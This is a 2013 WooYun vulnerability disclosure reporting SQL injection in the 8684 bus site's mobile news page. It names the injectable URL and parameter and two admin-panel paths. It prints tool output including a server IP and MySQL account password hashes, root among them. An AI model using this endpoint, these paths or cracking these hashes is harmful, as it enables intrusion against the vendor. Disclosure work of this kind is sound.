当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-017727

漏洞标题:8684公交注入可入后台

相关厂商:8684公交

漏洞作者: 瓜瓜

提交时间:2013-01-23 12:07

修复时间:2013-03-09 12:08

公开时间:2013-03-09 12:08

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-01-23: 细节已通知厂商并且等待厂商处理中
2013-01-23: 厂商已经确认,细节仅向厂商公开
2013-02-02: 细节向核心白帽子及相关领域专家公开
2013-02-12: 细节向普通白帽子公开
2013-02-22: 细节向实习白帽子公开
2013-03-09: 细节向公众公开

简要描述:

...听说有礼物。。。。

详细说明:

1.http://mobile.8684.cn/news.php?id=66此处存在.....然后很不幸的猜到了后台http://mobile.8684.cn/adm/index.php,当然,管理员的密码是很简单的...
2.赠送后台一枚http://id.8684.cn/m/

漏洞证明:

Target: 		http://mobile.8684.cn/news.php?id=66
Host IP: 101.71.22.54
Web Server: nginx
DB Server: MySQL >=5
Resp. Time(avg): 237 ms
Current User: [email protected]
Sql Version: 5.0.95-log
Current DB: mobile8684
System User: [email protected]
Host Name: db106
Installation dir: /usr/
DB User & Pass: root:*0383D090EE47FA1372DE603A50361CAA03BC8D7F:192.168.1.%
db130:*3DC8FD8A2A8D2BA6A00295EDC4CDDABE7C36E073:192.168.1.130
db130:*AAD023D95AFD513D386F328CBF14EB7E8B0A2FF1:%
Fany8684:*1C10E8BFA049D8A117FAADD2F6FA6DAA3BFFB298:%
coll_mysql:*D3F3F160E9A46F8C879E986BEC24EAC326E6CF79:%
8684mobile:*D8CCCD0F2E7F010E975AA3561D2F4EE279BA5405:%
8684rep:*9318F24E92A4C98CA761429C4C0FF43A7C0DD06F:%
mobile8684:*DD79578331FA15097C2F8586111549FD1A1D9256:%
Data Bases: information_schema
72card
72user
8684
8684flight


1.PNG

修复方案:

过滤

版权声明:转载请注明来源 瓜瓜@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2013-01-23 12:38

厂商回复:

漏洞已修复,请再次测试!谢谢!

最新状态:

暂无